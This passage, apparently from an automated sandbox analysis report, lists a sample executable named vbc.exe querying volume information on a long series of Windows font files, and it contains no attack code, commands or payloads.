Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
